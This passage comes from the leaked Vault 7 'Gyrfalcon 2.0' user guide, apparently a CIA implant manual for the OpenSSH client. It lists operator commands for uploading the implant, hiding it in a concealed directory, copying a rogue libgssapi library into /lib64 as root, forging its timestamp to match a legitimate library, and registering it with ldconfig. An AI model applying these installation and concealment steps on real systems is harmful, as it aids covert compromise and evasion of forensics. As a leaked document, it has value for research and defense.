Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN Gyrfalcon 2.0
4.5.4 config_file (named in step 4.3.4)
4.5.5 client (renamed in step 2 and named in step 4.3.6)
4.5.6 libgssapi.so.2.0.1
4.5.7 (U) To confirm the archive file contents:
4.5.7.1
tar jtvf archive_file
5. (S//NF) Upload the library, application, and encrypted configuration file to the target platform.
5.1 (U) They must be extracted from the archive file before uploading.
5.1.1 tar jxvf archive_file libgssapi.so.2.0.1
5.1.2 tar jxvf archive_file client
5.1.3 tar jxvf archive_file config_file
5.2 (S//NF) Gyrfalcon does not provide any communication services between the local
operator computer and target platform. The operator must use a third-party application to
upload these three files to the target platform.
6. (S//NF) If not already in the proper locations after upload, copy the library, application, and
encrypted configuration file to the correct directory(ies).
6.1 (S//NF) The application and encrypted configuration file must be kept in the same
directory of the operator's choosing, but preferably the operator will choose the JQC/KitV
hidden directory.
6.2 (S//NF) The library needs to be installed in a system library directory (i.e., /lib64 or
/usr/lib) on the target platform that is accessible by the OpenSSH client (i.e., /usr/bin/ssh).
6.2.1 ldd /usr/bin/ssh.
6.2.2 (U) Look for an entry in the output similar to –
6.2.2.1 “libgssapi_krb5.so.2 => /lib64/libgssapi_krb5.so.2”
6.2.3 (S//NF) The operator should copy the Gyrfalcon library to the same directory as
“libgssapi_krb5.so.2” (i.e., /lib64).
6.2.3.1 (as root) cp libgssapi.so.2.0.1 /lib64/
6.2.4 (S//NF) Change the Gyrfalcon library's access time to that of libgssapi_krb5.
6.2.4.1 (as root) touch /lib64/libgssapi.so.2.0.1 -r
/lib64/libgssapi_krb5.so.2.2.
6.2.5 (S//NF) Install the Gyrfalcon library into the dynamic linker cache.
6.2.5.1 (as root) ldconfig -v
6.2.6 (S//NF) Confirm the following files are in the system library directory identified
in step 6.2.2:
6.2.6.1 ls -l /lib64/libgssapi*
6.2.6.2 libgssapi.so.2 (a symbolic link to the actual library)
6.2.6.3 libgssapi.so.2.0.1 (the actual library)
6.2.7 (S//NF) Confirm the Gyrfalcon library is installed in the dynamic linker cache.
6.2.7.1 ldconfig -p | grep libgssapi
8 SECRET//NOFORN//20381126 November 2013